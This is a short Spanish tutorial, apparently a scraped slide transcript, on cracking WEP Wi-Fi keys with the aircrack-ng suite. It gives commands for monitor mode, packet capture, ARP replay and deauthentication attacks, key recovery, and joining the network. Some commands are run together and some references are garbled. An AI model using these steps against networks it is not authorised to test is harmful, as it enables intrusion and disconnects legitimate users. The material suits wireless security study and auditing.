aircrack-ng (tutorial)
TRANSCRIPT
![Page 1: AirCrack-ng (tutorial)](https://reader038.vdocuments.mx/reader038/viewer/2022100500/5516c9644a7959513d8b4690/html5/thumbnails/1.jpg)
Hacking Wireless: Suite Aircrack-ng
1. Escaneo de redes
Se pueden emplear distintas aplicaciones ("airodump-ng" o "kismet"):
airodump-ng rausb0.
2. Captura de paquetes
La captura de paquetes requiere que la tarjeta esté operando en modo monitor:
◦ Usando el comando "iwconfig": iwconfig dispositivo mode monitor
◦ Usando airmon-ng: airmon-ng start dispositivo [canal]
Iniciamos la captura de paquetes con el comando "airodump-ng":airodump-ng -w fichero_de_paquetes -c canal dispositivo
3. Inyección de paquetes
Podemos incrementar el tráfico de paquetes (y por consiguiente la cantidad de IVs) para acelerar el proceso de crackeo de la clave WEP empleando el método "ARP-request reinjection attack". Para ello es necesario que exista una estación conectada al punto de acceso, y a ser posible que ésta envíe información.
Búsqueda de paquetes ARP para reinyectar:aireplay-ng --arpreplay -b <BSSID> -h
<estación_conectada> disp
Podemos forzar la aparición de paquetes ARP mediante un ataque de deautentificación a la estación conectada:
aireplay-ng --deauth 5 -a <BSSID> -c
![Page 2: AirCrack-ng (tutorial)](https://reader038.vdocuments.mx/reader038/viewer/2022100500/5516c9644a7959513d8b4690/html5/thumbnails/2.jpg)
<estación_conectada> disp
En caso de que tengamos que detener la reinyección podremos reutilizar el paquete ARP capturado en otra ejecución empleando la opción "-r <fichero>" ("aireplay-ng --arpreplay" salva automáticamente el paquete ARP a reinyectar en el disco):
aireplay-ng --arpreplay -b <BSSID> -h <mac_estacion> -r <fichero> disp
Consultar el manual de aircrack-ng: newbie_guide [Aircrack-ng].pdf
4. Extracción de la contraseña
aircrack-ng -b <BSSID> <fichero_de_paquetes.cap>
En el primer método, el parámetro "-a 1" especifica que se trata de cifrado WEP.
5. Conexión a la red con encriptación WEP/WPA
ifconfig <dispositivo> downiwconfig <dispositivo> essid <ssid in ASCII> key <clave en
hex>ifconfig <dispositivo> up
Obtenemos la configuración de red por DHCP:¿¿dhcpcd <dispositivo>??